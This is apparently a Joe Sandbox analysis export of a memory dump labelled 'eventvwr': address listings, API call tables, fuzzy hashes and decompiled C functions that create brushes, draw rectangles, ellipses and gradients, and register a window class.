                                                                                                0x00c124cd
                                                                                                0x00c125c8
                                                                                                0x00c125c8
                                                                                                0x00c125cd
                                                                                                0x00c126af
                                                                                                0x00c126b6
                                                                                                0x00c126df
                                                                                                0x00c126df
                                                                                                0x00c126df
                                                                                                0x00c126e1
                                                                                                0x00c126e5
                                                                                                0x00c126e6
                                                                                                0x00c126e7
                                                                                                0x00c126f2
                                                                                                0x00c126f2
                                                                                                0x00c126c2
                                                                                                0x00c126ca
                                                                                                0x00c126d1
                                                                                                0x00c126d1
                                                                                                0x00c126d8
                                                                                                0x00c126de
                                                                                                0x00000000
                                                                                                0x00c126de
                                                                                                0x00c125d3
                                                                                                0x00c125d3
                                                                                                0x00c125d4
                                                                                                0x00c1267a
                                                                                                0x00c12680
                                                                                                0x00c12683
                                                                                                0x00c12686
                                                                                                0x00c12689
                                                                                                0x00c12690
                                                                                                0x00c12695
                                                                                                0x00c1269b
                                                                                                0x00c126a0
                                                                                                0x00c126a6
                                                                                                0x00000000
                                                                                                0x00c126a6
                                                                                                0x00c125da
                                                                                                0x00c125da
                                                                                                0x00c125db
                                                                                                0x00c1266a
                                                                                                0x00c12670
                                                                                                0x00000000
                                                                                                0x00c12670
                                                                                                0x00c125e2
                                                                                                0x00c125e2
                                                                                                0x00c125e3
                                                                                                0x00c1265b
                                                                                                0x00c12661
                                                                                                0x00000000
                                                                                                0x00c12661
                                                                                                0x00c125e5
                                                                                                0x00c125e5
                                                                                                0x00c125e6
                                                                                                0x00c125fe
                                                                                                0x00c12605
                                                                                                0x00c12607
                                                                                                0x00c12618
                                                                                                0x00c1261e
                                                                                                0x00c12625
                                                                                                0x00c1262b
                                                                                                0x00c1262d
                                                                                                0x00c1262f
                                                                                                0x00c12635
                                                                                                0x00c1263a
                                                                                                0x00c1263c
                                                                                                0x00c1263f
                                                                                                0x00c12641
                                                                                                0x00c12643
                                                                                                0x00c12649
                                                                                                0x00c12649
                                                                                                0x00c12641
                                                                                                0x00c1262d
                                                                                                0x00c1264e
                                                                                                0x00000000
                                                                                                0x00c1264e
                                                                                                0x00c125e8
                                                                                                0x00c125eb
                                                                                                0x00c125f2
                                                                                                0x00c125f2
                                                                                                0x00c125f5
                                                                                                0x00c125f8
                                                                                                0x00c1251e
                                                                                                0x00c1251f
                                                                                                0x00000000
                                                                                                0x00c1251f
                                                                                                0x00c125ed
                                                                                                0x00c125ed
                                                                                                0x00000000
                                                                                                0x00c125ed
                                                                                                0x00c124d3
                                                                                                0x00c125a1
                                                                                                0x00c125a8
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00c125ae
                                                                                                0x00c125b5
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00c125bc
                                                                                                0x00000000
                                                                                                0x00c125bc
                                                                                                0x00c124db
                                                                                                0x00c124dc
                                                                                                0x00c12596
                                                                                                0x00000000
                                                                                                0x00c12596
                                                                                                0x00c124e2
                                                                                                0x00c124e3
                                                                                                0x00c12581
                                                                                                0x00000000
                                                                                                0x00c12581
                                                                                                0x00c124e9
                                                                                                0x00c124ec
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00c124f2
                                                                                                0x00c124f5
                                                                                                0x00c12565
                                                                                                0x00c12566
                                                                                                0x00c12567
                                                                                                0x00c12574
                                                                                                0x00000000
                                                                                                0x00c12574
                                                                                                0x00c124f7
                                                                                                0x00c124fa
                                                                                                0x00c12553
                                                                                                0x00000000
                                                                                                0x00c12553
                                                                                                0x00c12501
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00c1250b
                                                                                                0x00c1250e
                                                                                                0x00c12546
                                                                                                0x00000000
                                                                                                0x00c12546
                                                                                                0x00c12511
                                                                                                0x00c1252b
                                                                                                0x00000000
                                                                                                0x00c12513
                                                                                                0x00c12513
                                                                                                0x00c12516
                                                                                                0x00c12519
                                                                                                0x00000000
                                                                                                0x00c12519

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.465008585.0000000000C11000.00000020.00020000.sdmp, Offset: 00C10000, based on PE: true
                                                                                                • Associated: 00000002.00000002.464985336.0000000000C10000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000002.00000002.465026006.0000000000C14000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000002.00000002.465049572.0000000000C16000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000002.00000002.465067843.0000000000C17000.00000002.00020000.sdmp Download File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_c10000_eventvwr.jbxd
                                                                                                Similarity
                                                                                                • API ID: Capture$PaintRectReleaseWindow$BeginClientDestroyDialogMessageParamPostProcQuitTimer
                                                                                                • String ID:
                                                                                                • API String ID: 4219887922-0
                                                                                                • Opcode ID: 4bcbdc3f403ab67b0540d227d422c6bf0f12c495759793245856cd1fe825af36
                                                                                                • Instruction ID: c00cb71310d8a6d4bae1097ca9c37d419b06702d130885f312c91dfcdd2cba04
                                                                                                • Opcode Fuzzy Hash: 4bcbdc3f403ab67b0540d227d422c6bf0f12c495759793245856cd1fe825af36
                                                                                                • Instruction Fuzzy Hash: BB51D336008249AFD7259F69AC49BFE3BA9F707741F148019F991D21E8DB248DE0FB61
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                C-Code - Quality: 100%
                                                                                                			E00C11129(intOrPtr _a4, intOrPtr _a8) {
                                                                                                				void* __esi;
                                                                                                				signed int _t21;
                                                                                                				void* _t25;
                                                                                                
                                                                                                				srand(GetTickCount());
                                                                                                				 *0xc165c0 = CreatePen(0, 3, 0);
                                                                                                				 *0xc165c4 = CreateSolidBrush(0xededed);
                                                                                                				 *0xc165c8 = CreateSolidBrush(0xa8e2ff);
                                                                                                				 *0xc165cc = CreateSolidBrush(0x99ff);
                                                                                                				 *0xc165d0 = CreateSolidBrush(0x40ab76);
                                                                                                				 *0xc165cc = CreateSolidBrush(0x8e48);
                                                                                                				E00C11741(0xc165f4, _t21 & 0xfffffff8, _t25, _a4, _a8);
                                                                                                				return E00C11741(0xc16610, _t21 & 0xfffffff8, _t25, _a4, _a8);
                                                                                                			}






                                                                                                0x00c11138
                                                                                                0x00c11156
                                                                                                0x00c11162
                                                                                                0x00c1116e
                                                                                                0x00c1117a
                                                                                                0x00c11186
                                                                                                0x00c11198
                                                                                                0x00c1119d
                                                                                                0x00c111b9

                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32 ref: 00C11131
                                                                                                • srand.MSVCR90 ref: 00C11138
                                                                                                • CreatePen.GDI32(00000000,00000003,00000000), ref: 00C11145
                                                                                                • CreateSolidBrush.GDI32(00EDEDED), ref: 00C1115B
                                                                                                • CreateSolidBrush.GDI32(00A8E2FF), ref: 00C11167
                                                                                                • CreateSolidBrush.GDI32(000099FF), ref: 00C11173
                                                                                                • CreateSolidBrush.GDI32(0040AB76), ref: 00C1117F
                                                                                                • CreateSolidBrush.GDI32(00008E48), ref: 00C1118B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.465008585.0000000000C11000.00000020.00020000.sdmp, Offset: 00C10000, based on PE: true
                                                                                                • Associated: 00000002.00000002.464985336.0000000000C10000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000002.00000002.465026006.0000000000C14000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000002.00000002.465049572.0000000000C16000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000002.00000002.465067843.0000000000C17000.00000002.00020000.sdmp Download File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_c10000_eventvwr.jbxd
                                                                                                Similarity
                                                                                                • API ID: Create$BrushSolid$CountTicksrand
                                                                                                • String ID:
                                                                                                • API String ID: 3112745008-0
                                                                                                • Opcode ID: e35bdb79114558b74c8cfe15e3843ce4edfd52731dc7b6d23623fd68cbbd6d1f
                                                                                                • Instruction ID: c65e77752282c805f34c7820c4ec4dc988d71f79a50afa4e1394c01f293f3fd9
                                                                                                • Opcode Fuzzy Hash: e35bdb79114558b74c8cfe15e3843ce4edfd52731dc7b6d23623fd68cbbd6d1f
                                                                                                • Instruction Fuzzy Hash: A2012871D40324ABDB106FB1AC0EBCD3E6AFB06760F048567FA18AB2E0EA755550DF84
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                C-Code - Quality: 67%
                                                                                                			E00C11A1F(void* __ecx) {
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				signed int _t82;
                                                                                                				signed int _t90;
                                                                                                				intOrPtr* _t91;
                                                                                                				void* _t103;
                                                                                                				int _t105;
                                                                                                				unsigned int _t108;
                                                                                                				intOrPtr _t118;
                                                                                                				int _t129;
                                                                                                				struct HDC__* _t130;
                                                                                                				void* _t131;
                                                                                                				signed int _t134;
                                                                                                				intOrPtr _t135;
                                                                                                				intOrPtr _t136;
                                                                                                				int _t137;
                                                                                                				signed int _t138;
                                                                                                				void* _t139;
                                                                                                				void* _t140;
                                                                                                				signed int _t141;
                                                                                                				void* _t143;
                                                                                                
                                                                                                				_t141 = _t143 - 0x70;
                                                                                                				_t82 =  *0xc16018; // 0x4f3fb031
                                                                                                				 *(_t141 + 0x6c) = _t82 ^ _t141;
                                                                                                				asm("movsd");
                                                                                                				asm("movsd");
                                                                                                				asm("movsd");
                                                                                                				 *(_t141 + 0x60) =  *(_t141 + 0x78);
                                                                                                				asm("movsd");
                                                                                                				OffsetRect(_t141 + 0x48,  ~( *(_t141 + 0x48)), 0);
                                                                                                				_t129 =  *(_t141 + 0x50);
                                                                                                				_t134 = 3;
                                                                                                				asm("cdq");
                                                                                                				_t90 = _t129 / _t134;
                                                                                                				_t105 =  *(_t141 + 0x54);
                                                                                                				_t135 = 2;
                                                                                                				 *((intOrPtr*)(_t141 - 0x20)) = _t135;
                                                                                                				 *((intOrPtr*)(_t141 - 0x18)) = _t135;
                                                                                                				_t136 = 6;
                                                                                                				 *((intOrPtr*)(_t141 - 8)) = _t136;
                                                                                                				 *_t141 = _t136;
                                                                                                				_t137 =  *(_t141 + 0x4c);
                                                                                                				 *(_t141 + 0xc) = _t137;
                                                                                                				 *(_t141 + 0x14) = _t137;
                                                                                                				 *(_t141 + 0x2c) = _t137;
                                                                                                				 *(_t141 + 0x34) = _t137;
                                                                                                				 *(_t141 + 0x5c) = _t129;
                                                                                                				 *(_t141 + 0x58) = _t105;
                                                                                                				 *((intOrPtr*)(_t141 - 0x28)) = 0;
                                                                                                				 *((intOrPtr*)(_t141 - 0x24)) = 1;
                                                                                                				 *((intOrPtr*)(_t141 - 0x1c)) = 0;
                                                                                                				 *((intOrPtr*)(_t141 - 0x14)) = 3;
                                                                                                				 *((intOrPtr*)(_t141 - 0x10)) = 4;
                                                                                                				 *((intOrPtr*)(_t141 - 0xc)) = 5;
                                                                                                				 *((intOrPtr*)(_t141 - 4)) = 4;
                                                                                                				 *((intOrPtr*)(_t141 + 4)) = 7;
                                                                                                				_t118 = _t90 + _t90;
                                                                                                				 *(_t141 + 8) = _t90;
                                                                                                				 *(_t141 + 0x18) = _t90;
                                                                                                				 *(_t141 + 0x40) = _t90;
                                                                                                				 *((intOrPtr*)(_t141 + 0x10)) = _t118;
                                                                                                				 *(_t141 + 0x1c) = _t105;
                                                                                                				 *((intOrPtr*)(_t141 + 0x20)) = 0;
                                                                                                				 *(_t141 + 0x24) = _t105;
                                                                                                				 *((intOrPtr*)(_t141 + 0x28)) = _t118;
                                                                                                				 *(_t141 + 0x30) = _t129;
                                                                                                				 *((intOrPtr*)(_t141 + 0x38)) = _t118;
                                                                                                				 *(_t141 + 0x3c) = _t105;
                                                                                                				 *(_t141 + 0x44) = _t105;
                                                                                                				 *((char*)(_t141 + 0x64)) = 0;
                                                                                                				 *((char*)(_t141 + 0x65)) = 1;
                                                                                                				 *((char*)(_t141 + 0x66)) = 1;
                                                                                                				 *((char*)(_t141 + 0x67)) = 0;
                                                                                                				 *((char*)(_t141 + 0x68)) = 1;
                                                                                                				 *((char*)(_t141 + 0x69)) = 0;
                                                                                                				 *((char*)(_t141 + 0x6a)) = 0;
                                                                                                				 *((char*)(_t141 + 0x6b)) = 1;
                                                                                                				_t138 = 0;
                                                                                                				_t91 = _t141 - 0xa4;
                                                                                                				do {
                                                                                                					asm("sbb ecx, ecx");
                                                                                                					_t108 =  ~( *(_t141 + _t138 + 0x64) & 0x000000ff) &  *(_t141 + 0x7c);
                                                                                                					 *((intOrPtr*)(_t91 - 4)) =  *((intOrPtr*)(_t141 + 8 + _t138 * 8));
                                                                                                					 *_t91 =  *((intOrPtr*)(_t141 + 0xc + _t138 * 8));
                                                                                                					 *(_t91 + 4) = (_t108 & 0x000000ff) << 8;
                                                                                                					 *(_t91 + 8) = (_t108 >> 0x00000010 & 0x000000ff) << 8;
                                                                                                					_t126 = (_t108 >> 0x00000008 & 0x000000ff) << 8;
                                                                                                					asm("sbb ecx, ecx");
                                                                                                					 *(_t91 + 6) = (_t108 >> 0x00000008 & 0x000000ff) << 8;
                                                                                                					 *((short*)(_t91 + 0xa)) =  ~( *(_t141 + _t138 + 0x64) & 0x000000ff) & 0x0000ff00;
                                                                                                					_t138 = _t138 + 1;
                                                                                                					_t91 = _t91 + 0x10;
                                                                                                				} while (_t138 < 8);
                                                                                                				_t130 = CreateCompatibleDC( *(_t141 + 0x60));
                                                                                                				_t139 = CreateCompatibleBitmap( *(_t141 + 0x60),  *(_t141 + 0x5c),  *(_t141 + 0x58));
                                                                                                				SelectObject(_t130, _t139);
                                                                                                				BitBlt(_t130, 0, 0,  *(_t141 + 0x5c),  *(_t141 + 0x58),  *(_t141 + 0x60),  *(_t141 + 0x48),  *(_t141 + 0x4c), 0x42);
                                                                                                				__imp__GradientFill(_t141 - 0xa8, _t141 - 0x28, 4, 2);
                                                                                                				DeleteDC(_t130);
                                                                                                				_t131 = _t130;
                                                                                                				 *0xc165d8 = _t139;
                                                                                                				_pop(_t140);
                                                                                                				_t103 = 8;
                                                                                                				return E00C1272C(_t139, _t103,  *(_t141 + 0x6c) ^ _t141, _t126, _t131, _t140);
                                                                                                			}

























                                                                                                0x00c11a20
                                                                                                0x00c11a2a
                                                                                                0x00c11a31
                                                                                                0x00c11a3f
                                                                                                0x00c11a40
                                                                                                0x00c11a41
                                                                                                0x00c11a42
                                                                                                0x00c11a45
                                                                                                0x00c11a53
                                                                                                0x00c11a59
                                                                                                0x00c11a5e
                                                                                                0x00c11a61
                                                                                                0x00c11a62
                                                                                                0x00c11a64
                                                                                                0x00c11a69
                                                                                                0x00c11a6a
                                                                                                0x00c11a6d
                                                                                                0x00c11a72
                                                                                                0x00c11a73
                                                                                                0x00c11a76
                                                                                                0x00c11a79
                                                                                                0x00c11a7c
                                                                                                0x00c11a7f
                                                                                                0x00c11a82
                                                                                                0x00c11a85
                                                                                                0x00c11a88
                                                                                                0x00c11a8b
                                                                                                0x00c11a8e
                                                                                                0x00c11a91
                                                                                                0x00c11a98
                                                                                                0x00c11a9b
                                                                                                0x00c11aa2
                                                                                                0x00c11aa9
                                                                                                0x00c11ab0
                                                                                                0x00c11ab7
                                                                                                0x00c11abe
                                                                                                0x00c11ac1
                                                                                                0x00c11ac4
                                                                                                0x00c11ac7
                                                                                                0x00c11aca
                                                                                                0x00c11acd
                                                                                                0x00c11ad0
                                                                                                0x00c11ad3
                                                                                                0x00c11ad6
                                                                                                0x00c11ad9
                                                                                                0x00c11adc
                                                                                                0x00c11adf
                                                                                                0x00c11ae2
                                                                                                0x00c11ae5
                                                                                                0x00c11ae8
                                                                                                0x00c11aec
                                                                                                0x00c11af0
                                                                                                0x00c11af3
                                                                                                0x00c11af7
                                                                                                0x00c11afa
                                                                                                0x00c11afd
                                                                                                0x00c11b01
                                                                                                0x00c11b03
                                                                                                0x00c11b09
                                                                                                0x00c11b14
                                                                                                0x00c11b16
                                                                                                0x00c11b19
                                                                                                0x00c11b20
                                                                                                0x00c11b2a
                                                                                                0x00c11b3e
                                                                                                0x00c11b4b
                                                                                                0x00c11b51
                                                                                                0x00c11b59
                                                                                                0x00c11b5d
                                                                                                0x00c11b61
                                                                                                0x00c11b62
                                                                                                0x00c11b65
                                                                                                0x00c11b76
                                                                                                0x00c11b84
                                                                                                0x00c11b88
                                                                                                0x00c11ba2
                                                                                                0x00c11bba
                                                                                                0x00c11bc1
                                                                                                0x00c11bca
                                                                                                0x00c11bcb
                                                                                                0x00c11bd3
                                                                                                0x00c11bd6
                                                                                                0x00c11be0

                                                                                                APIs
                                                                                                • OffsetRect.USER32(?,?,00000000), ref: 00C11A53
                                                                                                • CreateCompatibleDC.GDI32(?), ref: 00C11B6D
                                                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00C11B7E
                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00C11B88
                                                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00000042), ref: 00C11BA2
                                                                                                • GradientFill.MSIMG32(00000000,?,00000008,?,00000004,00000002,?,?), ref: 00C11BBA
                                                                                                • DeleteDC.GDI32(00000000), ref: 00C11BC1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.465008585.0000000000C11000.00000020.00020000.sdmp, Offset: 00C10000, based on PE: true
                                                                                                • Associated: 00000002.00000002.464985336.0000000000C10000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000002.00000002.465026006.0000000000C14000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000002.00000002.465049572.0000000000C16000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000002.00000002.465067843.0000000000C17000.00000002.00020000.sdmp Download File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_c10000_eventvwr.jbxd
                                                                                                Similarity
                                                                                                • API ID: CompatibleCreate$BitmapDeleteFillGradientObjectOffsetRectSelect
                                                                                                • String ID:
                                                                                                • API String ID: 4124605331-0
                                                                                                • Opcode ID: 57071b3482c0c9a1cee6c78ce55a6ab5514b97d9cff3b1c63068fdae965287c9
                                                                                                • Instruction ID: fc060744ad11bba9490da60f450aee10bb29b981e9e5e641198131dae4f76e36
                                                                                                • Opcode Fuzzy Hash: 57071b3482c0c9a1cee6c78ce55a6ab5514b97d9cff3b1c63068fdae965287c9
                                                                                                • Instruction Fuzzy Hash: 905134B19103589FDB09DFA9C844AEE7FA9FF0A304F01816AFE1997260D3B58944DB94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                C-Code - Quality: 94%
                                                                                                			E00C1186A(intOrPtr* __eax, struct HDC__* _a4, struct HRGN__* _a8, char _a12, signed int _a16, signed int _a24) {
                                                                                                				intOrPtr _v12;
                                                                                                				intOrPtr _v16;
                                                                                                				intOrPtr _v20;
                                                                                                				int _v24;
                                                                                                				intOrPtr _v28;
                                                                                                				char _v32;
                                                                                                				void* __esi;
                                                                                                				char _t48;
                                                                                                				intOrPtr _t53;
                                                                                                				int _t56;
                                                                                                				int _t58;
                                                                                                				int _t60;
                                                                                                				int _t66;
                                                                                                				int _t68;
                                                                                                				int _t70;
                                                                                                				void* _t73;
                                                                                                				intOrPtr* _t74;
                                                                                                				intOrPtr* _t75;
                                                                                                				char _t76;
                                                                                                
                                                                                                				_t75 = __eax;
                                                                                                				_v24 = SaveDC(_a4);
                                                                                                				SelectClipRgn(_a4, _a8);
                                                                                                				_t74 =  *((intOrPtr*)(_t75 + 0x14));
                                                                                                				_t76 =  *_t75;
                                                                                                				_v28 =  *_t74;
                                                                                                				_v12 = _t76;
                                                                                                				_v32 = _t76;
                                                                                                				while(1) {
                                                                                                					_t48 = _v32;
                                                                                                					if(_t48 == 0 || _t48 != _v12) {
                                                                                                						__imp___invalid_parameter_noinfo();
                                                                                                					}
                                                                                                					if(_v28 == _t74) {
                                                                                                						break;
                                                                                                					}
                                                                                                					_t77 =  &_v32;
                                                                                                					SelectObject(_a4,  *(E00C11DF8( &_v32) + 0x20));
                                                                                                					_t73 = E00C11DF8( &_v32);
                                                                                                					_t53 = E00C11DF8(_t77);
                                                                                                					if(_a12 == 0) {
                                                                                                						_v20 = _t53;
                                                                                                						_v16 = E00C11DF8(_t77);
                                                                                                						_t56 = E00C13140(E00C11DF8( &_v32),  *(_t73 + 0x18) * _a24);
                                                                                                						_t58 = E00C13140(_v20,  *(_v20 + 0x10) * _a16);
                                                                                                						_t60 = E00C13140(_v16,  *(_v16 + 8) * _a24);
                                                                                                						Rectangle(_a4, E00C13140(_t60,  *_t55 * _a16), _t60, _t58, _t56);
                                                                                                					} else {
                                                                                                						_v16 = _t53;
                                                                                                						_v20 = E00C11DF8(_t77);
                                                                                                						_t66 = E00C13140(E00C11DF8(_t77),  *(_t73 + 0x18) * _a24);
                                                                                                						_t68 = E00C13140(_v16,  *(_v16 + 0x10) * _a16);
                                                                                                						_t70 = E00C13140(_v20,  *(_v20 + 8) * _a24);
                                                                                                						Ellipse(_a4, E00C13140(_t70,  *_t65 * _a16), _t70, _t68, _t66);
                                                                                                					}
                                                                                                					E00C11C99( &_v32);
                                                                                                				}
                                                                                                				return RestoreDC(_a4, _v24);
                                                                                                			}






















                                                                                                0x00c11876
                                                                                                0x00c11881
                                                                                                0x00c11887
                                                                                                0x00c1188d
                                                                                                0x00c11890
                                                                                                0x00c11894
                                                                                                0x00c11897
                                                                                                0x00c1189a
                                                                                                0x00c1189d
                                                                                                0x00c1189d
                                                                                                0x00c118a2
                                                                                                0x00c118a9
                                                                                                0x00c118a9
                                                                                                0x00c118b2
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00c118b8
                                                                                                0x00c118c6
                                                                                                0x00c118d1
                                                                                                0x00c118d3
                                                                                                0x00c118dc
                                                                                                0x00c11930
                                                                                                0x00c1193b
                                                                                                0x00c1194b
                                                                                                0x00c1195a
                                                                                                0x00c11969
                                                                                                0x00c1197d
                                                                                                0x00c118de
                                                                                                0x00c118de
                                                                                                0x00c118e6
                                                                                                0x00c118f6
                                                                                                0x00c11905
                                                                                                0x00c11914
                                                                                                0x00c11928
                                                                                                0x00c11928
                                                                                                0x00c11986
                                                                                                0x00c11986
                                                                                                0x00c119a0

                                                                                                APIs
                                                                                                • SaveDC.GDI32(?), ref: 00C11878
                                                                                                • SelectClipRgn.GDI32(?,?), ref: 00C11887
                                                                                                • _invalid_parameter_noinfo.MSVCR90 ref: 00C118A9
                                                                                                • SelectObject.GDI32(?,?), ref: 00C118C6
                                                                                                • Ellipse.GDI32(?,00000000,00000000,00000000,00000000), ref: 00C11928
                                                                                                • Rectangle.GDI32(?,00000000,00000000,00000000,00000000), ref: 00C1197D
                                                                                                • RestoreDC.GDI32(?,?), ref: 00C11996
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.465008585.0000000000C11000.00000020.00020000.sdmp, Offset: 00C10000, based on PE: true
                                                                                                • Associated: 00000002.00000002.464985336.0000000000C10000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000002.00000002.465026006.0000000000C14000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000002.00000002.465049572.0000000000C16000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000002.00000002.465067843.0000000000C17000.00000002.00020000.sdmp Download File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_c10000_eventvwr.jbxd
                                                                                                Similarity
                                                                                                • API ID: Select$ClipEllipseObjectRectangleRestoreSave_invalid_parameter_noinfo
                                                                                                • String ID:
                                                                                                • API String ID: 996756098-0
                                                                                                • Opcode ID: 3ee6ee41c2798373aeb58f8ef2757a44bdd32116ec9afa31071dbd95e3542ad2
                                                                                                • Instruction ID: 9659c94d980c062ec24f155ca50f4c2e7371e986b3b6a2ea7278e0dfa350c62d
                                                                                                • Opcode Fuzzy Hash: 3ee6ee41c2798373aeb58f8ef2757a44bdd32116ec9afa31071dbd95e3542ad2
                                                                                                • Instruction Fuzzy Hash: A9413571D0021AEBCF00AFA5EC0AADEBB74FF09750B168551F951B3121CB34DAA5EB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 243 c123c4-c12434 LoadIconW LoadCursorW LoadIconW RegisterClassExW
                                                                                                C-Code - Quality: 100%
                                                                                                			E00C123C4(struct HINSTANCE__* __eax) {
                                                                                                				struct _WNDCLASSEXW _v52;
                                                                                                
                                                                                                				_v52.cbClsExtra = _v52.cbClsExtra & 0x00000000;
                                                                                                				_v52.cbWndExtra = _v52.cbWndExtra & 0x00000000;
                                                                                                				_v52.cbSize = 0x30;
                                                                                                				_v52.style = 3;
                                                                                                				_v52.lpfnWndProc = E00C124A9;
                                                                                                				_v52.hInstance = __eax;
                                                                                                				_v52.hIcon = LoadIconW(__eax, 0x6b);
                                                                                                				_v52.hCursor = LoadCursorW(0, 0x7f00);
                                                                                                				_v52.hbrBackground = 6;
                                                                                                				_v52.lpszMenuName = 0x6d;
                                                                                                				_v52.lpszClassName = 0xc16410;
                                                                                                				_v52.hIconSm = LoadIconW(_v52.hInstance, 0x6c);
                                                                                                				return RegisterClassExW( &_v52);
                                                                                                			}




                                                                                                0x00c123ca
                                                                                                0x00c123ce
                                                                                                0x00c123dc
                                                                                                0x00c123e3
                                                                                                0x00c123ea
                                                                                                0x00c123f1
                                                                                                0x00c123fd
                                                                                                0x00c1240b
                                                                                                0x00c1240e
                                                                                                0x00c12415
                                                                                                0x00c1241c
                                                                                                0x00c12425
                                                                                                0x00c12434

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.465008585.0000000000C11000.00000020.00020000.sdmp, Offset: 00C10000, based on PE: true
                                                                                                • Associated: 00000002.00000002.464985336.0000000000C10000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000002.00000002.465026006.0000000000C14000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000002.00000002.465049572.0000000000C16000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000002.00000002.465067843.0000000000C17000.00000002.00020000.sdmp Download File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_c10000_eventvwr.jbxd
                                                                                                Similarity
                                                                                                • API ID: Load$Icon$ClassCursorRegister
                                                                                                • String ID: 0$m
                                                                                                • API String ID: 4202395251-432128193
                                                                                                • Opcode ID: f64d465029403c2fe231957b837f7dabcabf48fdaa770dd28da0aaa7628ece1a
                                                                                                • Instruction ID: 141681633313b37b3a6593eae1cbe7db6ffe05ed49c4d8ba25b28c89c954e453
                                                                                                • Opcode Fuzzy Hash: f64d465029403c2fe231957b837f7dabcabf48fdaa770dd28da0aaa7628ece1a
                                                                                                • Instruction Fuzzy Hash: 770114B1C10219ABEF009FE4DC09BDEBFB8BB09315F10841AE510B6281D7B916548FA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 244 c11772-c11796 rand 245 c11798 244->245 246 c1179e-c117b4 rand 244->246 245->246 247 c117b6 246->247 248 c117bc-c117c7 246->248 247->248 249 c117c9 248->249 250 c117cf-c117f0 rand 248->250 249->250 251 c117f2 250->251 252 c117f8-c1182a rand * 2 250->252 251->252 253 c1182c-c1182d 252->253 254 c1185e 252->254 256 c11857-c1185c 253->256 257 c1182f-c11830 253->257 255 c11863-c11869 254->255 256->255 258 c11850-c11855 257->258 259 c11832-c11833 257->259 258->255 260 c11835-c11836 259->260 261 c11849-c1184e 259->261 262 c11842-c11847 260->262 263 c11838-c11840 GetStockObject 260->263 261->255 262->255 263->255
                                                                                                C-Code - Quality: 80%
                                                                                                			E00C11772(unsigned int __eax, signed long long* __edi, signed long long __fp0, unsigned int _a4) {
                                                                                                				signed int _v12;
                                                                                                				signed int _v16;
                                                                                                				signed int _v24;
                                                                                                				signed long long _v32;
                                                                                                				signed long long _v40;
                                                                                                				signed int _t49;
                                                                                                				unsigned int _t51;
                                                                                                				signed int _t52;
                                                                                                				signed int _t54;
                                                                                                				void* _t56;
                                                                                                				unsigned int _t57;
                                                                                                				signed int _t67;
                                                                                                				signed int _t69;
                                                                                                				signed int _t71;
                                                                                                				signed int _t75;
                                                                                                				void* _t76;
                                                                                                				void* _t77;
                                                                                                				void* _t78;
                                                                                                				signed long long* _t80;
                                                                                                				signed long long _t92;
                                                                                                
                                                                                                				_t91 = __fp0;
                                                                                                				_t80 = __edi;
                                                                                                				_t57 = __eax;
                                                                                                				_t69 = rand() % ((_a4 >> 1) - 1);
                                                                                                				_v12 = _t69;
                                                                                                				asm("fild dword [ebp-0x8]");
                                                                                                				if(_t69 < 0) {
                                                                                                					_t91 = __fp0 +  *0xc14438;
                                                                                                				}
                                                                                                				_v32 = _t91;
                                                                                                				_t71 = rand() % ((_t57 >> 1) - 1);
                                                                                                				_v12 = _t71;
                                                                                                				asm("fild dword [ebp-0x8]");
                                                                                                				if(_t71 < 0) {
                                                                                                					_t91 = _t91 +  *0xc14438;
                                                                                                				}
                                                                                                				_v40 = _t91;
                                                                                                				asm("fild dword [ebp+0x8]");
                                                                                                				if(_a4 < 0) {
                                                                                                					_t91 = _t91 +  *0xc14438;
                                                                                                				}
                                                                                                				_v16 = _t91;
                                                                                                				_t49 = rand();
                                                                                                				asm("cdq");
                                                                                                				_t51 = _t57;
                                                                                                				_a4 = _t49 % (_a4 - 1);
                                                                                                				asm("fild dword [ebp+0x8]");
                                                                                                				_a4 = _t51;
